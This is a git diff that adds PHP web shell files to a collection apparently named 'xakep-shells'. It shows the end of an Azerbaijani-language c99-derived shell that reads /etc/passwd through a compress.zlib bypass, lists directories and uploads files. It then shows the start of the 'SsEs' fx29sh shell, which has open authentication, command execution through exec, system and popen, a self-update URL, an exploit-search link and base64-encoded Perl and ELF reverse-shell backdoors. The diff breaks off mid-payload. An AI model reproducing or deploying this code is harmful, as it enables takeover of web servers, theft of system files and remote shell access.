+		Fayl Oxu [ByPass Method 2]</strong></font></div>
+    <font face="Tahoma">
+    <br>
+    </font>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      <font face="Tahoma">&#399;mr S&#601;tiri: </font> 
+		<input type="text" name="file" value="/etc/passwd/" size="11" tabindex="1"><font face="Tahoma">
+		</font> <input type="submit" value="Fayl&#305; Oxu"><font face="Tahoma"><br><br> 
+		M&#601;s&#601;l&#601;n: /etc/passwd/<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </font>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <font face="Tahoma"><strong>Qorunmani Ke&ccedil;, Qovluq Oxu [ByPass Method 1]</strong>:     
+     </font>
+		<p>&nbsp;</p>
+		<p>&nbsp;</p>
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><font face="Tahoma"><br>
+      	&#399;mr S&#601;tiri: </font> <input type="text" name="directory"><font face="Tahoma">
+		</font> <input type="submit" value="&#304;ndi Oxu!"><font face="Tahoma"><br><br> 
+		M&#601;s&#601;l&#601;n: /etc/<br>
+
+    	</font>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+					<font face="Tahoma">
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b><font face="Tahoma">Axtar&#305;&#351;</font></b><font face="Tahoma">
+   </font>
+   <form method="POST"><input type=hidden name=act value="Simdi Ara!"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"><font face="Tahoma">&nbsp;</font><input type="checkbox" name="search_name_regexp" value="1"  checked><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <font face="Tahoma">
+   <b>Upload</b>
+   </font>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="Upload Et!"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td>
+</tr>
+</table>
+			<font face="Tahoma">
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong><font face="Tahoma">Qovluq Yarat</font></strong><p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Yarat"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong><font face="Tahoma">Fayl Yarat</font></strong><font face="Tahoma">
+    </font>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"><font face="Tahoma">&nbsp;</font><input type=submit value="Yarat"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td></tr></table>
+
+			<font face="Tahoma">
+
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <font face="Tahoma">
+  <b>Qovluqa Get</b>
+  </font>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Get"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <font face="Tahoma">
+    <b>Fayla Get</b>
+    </font>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Get"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#330000 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top">
+<font face="Tahoma">
+<?php
+echo "
+<table border='0' width='100%' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>H&#601;cm</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>".view_size($total)."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Sizin Ip'niz</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=http://".$_SERVER['REMOTE_ADDR']."
+		<font face='Tahoma' size='1' color='#00FF00'>".$_SERVER['REMOTE_ADDR']."</font></td>
+	</tr>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos H&#601;cm</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>".view_size($free)."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Server</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=http://".gethostbyname($_SERVER['HTTP_HOST'])."
+		<font face='Tahoma' size='1' color='#00FF00'>".gethostbyname($_SERVER['HTTP_HOST'])."</font></td>
+	</tr>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Faiz</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>%".$free_percent."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>D&#601;st&#601;k Server</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=$dsunucu
+		<td><font face='Tahoma' size='1' color='#00FF00'>http://www.caspian-pirates.org</font></td>
+	</tr>
+</table>
+";
+?></font><hr><p align='center'><font face='Tahoma' size='1'>[ Special 99 Shell 
+v1.0 || Developing by </font>
+<font face='Tahoma' size='2'> <font color='white'><a href='http://caspian-pirates.org'>
+<font face="Tahoma"><b>&#3628;a&#1106;&#3648;t&#1108;_&#3628;&#3663;l&#358;</b></font></a></font> </font><font face='Tahoma' size='1'>
+|| <a href='http://www.Caspian-Pirates.OrG'>
+<font face="Tahoma">Caspian-Pirates.OrG</font></a> ]</font></p>
+</td></tr></table>+
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SsEs.php.php.txt b/xakep-shells/PHP/SsEs.php.php.txt
new file mode 100644
index 0000000..32ea97f
--- /dev/null
+++ b/xakep-shells/PHP/SsEs.php.php.txt
@@ -0,0 +1,3309 @@
+<?php
+/********************************************/
+/* dhie-Q fx29sh v1 06.2008                 */
+/* Re-coded dhie-Q modified By  SsEs     */
+/* #www.h4cks.in           */
+/*******************************************/
+$sh_id = "RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=";
+$sh_ver = "0.01 07.2008";
+$sh_name = "SsEs 191814 Shell Modified ";
+$sh_mainurl = "http://www.h4cks.in/";
+$html_start = ''.
+'<html><head>
+<title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
+<style type="text/css">
+<!--
+body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
+table { width:100%; }
+table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
+a { color:lightblue;text-decoration:none; }
+a:active { color:#00FF00; }
+a:link { color:#5B5BFF; }
+a:hover { text-decoration:underline; }
+a:visited { color:#99CCFF; }
+input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
+textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;margin:2; }
+.fleft { float:left;text-align:left; }
+.fright { float:right;text-align:right; }
+#pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-collapse:collapse; }
+#pagebar td { vertical-align:top; }
+#pagebar p { font:8pt tahoma;}
+#pagebar a { font-weight:bold;color:#00FF00; }
+#pagebar a:visited { color:#00CE00; }
+#mainmenu { text-align:center; }
+#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
+#maininfo,.barheader,.barheader2 { text-align:center; }
+#maininfo td { padding:3px; }
+.barheader { font-weight:bold;padding:5px; }
+.barheader2 { padding:5px;border:2px solid #1F1F1F; }
+.contents,.explorer { border-collapse:collapse;}
+.contents td { vertical-align:top; }
+.mainpanel { border-collapse:collapse;padding:5px; }
+.barheader,.mainpanel table,td { border:1px solid #333333; }
+.mainpanel input,select,option { border:1px solid #333333;margin:0; }
+input[type="submit"] { border:1px solid #000000; }
+input[type="text"] { padding:3px;}
+.shell { background-color:#C0C0C0;color:#000080;padding:5px; }
+.fxerrmsg { color:red; font-weight:bold; }
+#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
+#pagebar,.mainpanel,input[type="submit"] { background-color:#4A4A4A; }
+.barheader2,input,select,option,input[type="submit"]:hover { background-color:#333333; }
+textarea,.mainpanel input,select,option { background-color:#000000; }
+// -->
+</style>
+</head>
+<body>
+';
+//Authentication
+$login = ""; 
+$pass = "";
+$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
+$host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted Area"; //Pesan HTTP-Auth
+$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
+$gzipencode = TRUE;
+$updatenow = FALSE; //Jika TRUE, update shell sekarang.
+$c99sh_updateurl = $sh_mainurl."
+_update.php";
+$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
+//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
+//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
+$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
+$curdir = "./";
+$tmpdir = ""; 
+$tmpdir_log = "./";
+$log_email = "q.dhie@yahoo.com"; //email untuk pengiriman log.
+$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
+$sess_cookie = "c99shvars"; //Nama variabel Cookie
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc)) {
+  $disablefunc = str_replace(" ","",$disablefunc);
+  $disablefunc = explode(",",$disablefunc);
+}
+//Functions
+function get_phpini() {
+  function U_wordwrap($str) {
+    $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+    return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+  }
+  function U_value($value) {
+    if ($value == '') return '<i>no value</i>';
+    if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+    if ($value === null) return 'NULL';
+    if (@is_object($value)) $value = (array) $value;
+    if (@is_array($value)) {
+      @ob_start();
+      print_r($value);
+      $value = @ob_get_contents();
+      @ob_end_clean();
+    }
+    return U_wordwrap((string) $value);
+  }
+  if (@function_exists('ini_get_all')) {
+    $r = "";
+    echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
+    foreach (@ini_get_all() as $key=>$value) {
+      $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
+    }
+    echo $r;
+    echo "</table>";
+  }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) {$bool = is_dir($letter.":\\");}
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+      ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
+      if ($letter.":" != $v) {$letters .= $letter;}
+      else {$letters .= "<font color=yellow>".$letter."</font>";}
+      $letters .= "]</a> ";
+    }
+  }
+  if (!empty($letters)) {Return $letters;}
+  else {Return "None";}
+}
+if (is_callable("disk_free_space")) {
+  function disp_freespace($curdrv) {
+    $free = disk_free_space($curdrv);
+    $total = disk_total_space($curdrv);
+    if ($free === FALSE) {$free = 0;}
+    if ($total === FALSE) {$total = 0;}
+    if ($free < 0) {$free = 0;}
+    if ($total < 0) {$total = 0;}
+    $used = $total-$free;
+    $free_percent = round(100/($total/$free),2)."%";
+    $free = view_size($free);
+    $total = view_size($total);
+    return "$free of $total ($free_percent)";
+  }
+}
+//w4ck1ng Shell
+if (!function_exists("myshellexec")) {
+  if(is_callable("popen")) {
+    function myshellexec($cmd) {
+      if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
+      while (!feof($p)) {
+        $line=fgets($p,1024);
+        $out .= $line;
+      }
+      pclose($p);
+      return $out;
+    }
+  } else {
+    function myshellexec($cmd) {
+      global $disablefunc;
+      $result = "";
+      if (!empty($cmd)) {
+        if (is_callable("exec") and !in_array("exec",$disablefunc)) {
+          exec($cmd,$result);
+          $result = join("\n",$result);
+        } elseif (($result = $cmd) !== FALSE) {
+        } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
+          $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
+        } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
+          $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
+        } elseif (is_resource($fp = popen($cmd,"r"))) {
+          $result = "";
+          while(!feof($fp)) { $result .= fread($fp,1024); }
+          pclose($fp);
+        }
+      }
+      return $result;
+    }
+  }
+}
+function ex($cfe) {
+  $res = '';
+  if (!empty($cfe)) {
+    if(function_exists('exec')) {
+      @exec($cfe,$res);
+      $res = join("\n",$res);
+    } elseif(function_exists('shell_exec')) {
+      $res = @shell_exec($cfe);
+    } elseif(function_exists('system')) {
+      @ob_start();
+      @system($cfe);
+      $res = @ob_get_contents();
+      @ob_end_clean();
+    } elseif(function_exists('passthru')) {
+      @ob_start();
+      @passthru($cfe);
+      $res = @ob_get_contents();
+      @ob_end_clean();
+    } elseif(@is_resource($f = @popen($cfe,"r"))) {
+      $res = "";
+      while(!@feof($f)) { $res .= @fread($f,1024); }
+      @pclose($f);
+    } else { $res = "Ex() Disabled!"; }
+  }
+  return $res;
+}
+function which($pr) {
+  $path = ex("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+//End of w4ck1ng Shell
+
+//Start Enumerate function
+$hostname_x = php_uname(n);
+$itshome = getcwd();
+if (!$win) {
+  $itshome = str_replace("/home/","~",$itshome);
+  $itshome = str_replace("/public_html","/fx29sh.php",$itshome);
+}
+else { $itshome = ""; }
+$enumerate = "http://".$hostname_x."/".$itshome."";
+//End Enumerate function
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV)) {
+  $Lversion=substr($Lversion,0,6);
+  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+} else {
+  $Lversion=substr($Lversion,0,3);
+  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+//Backdoor
+$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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yIQECMgEAAAQAQAAAAAAAAAAAAAEAAAABAAAAHsAAAABAAAABgAAANiFBAjYBQAA+AIAAAAAAAAAAAAABAAAAAAAAACBAAAAAQAAAAYAAADQiAQI0AgAABoAAAAAAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAACAAAA7IgECOwIAAA5AAAAAAAAAAAAAAAEAAAAAAAAAI8AAAABAAAAAgAAACiJBAgoCQAABAAAAAAAAAAAAAAABAAAAAAAAACZAAAAAQAAAAMAAAAsmQQILAkAAAgAAAAAAAAAAAAAAAQAAAAAAAAAoAAAAAEAAAADAAAANJkECDQJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAABAAAAAwAAADyZBAg8CQAABAAAAAAAAAAAAAAABAAAAAAAAACsAAAABgAAAAMAAABAmQQIQAkAAMgAAAAFAAAAAAAAAAQAAAAIAAAAtQAAAAEAAAADAAAACJoECAgKAAAEAAAAAAAAAAAAAAAEAAAABAAAALoAAAABAAAAAwAAAAyaBAgMCgAATAAAAAAAAAAAAAAABAAAAAQAAADDAAAAAQAAAAMAAABYmgQIWAoAAAwAAAAAAAAAAAAAAAQAAAAAAAAAyQAAAAgAAAADAAAAZJoECGQKA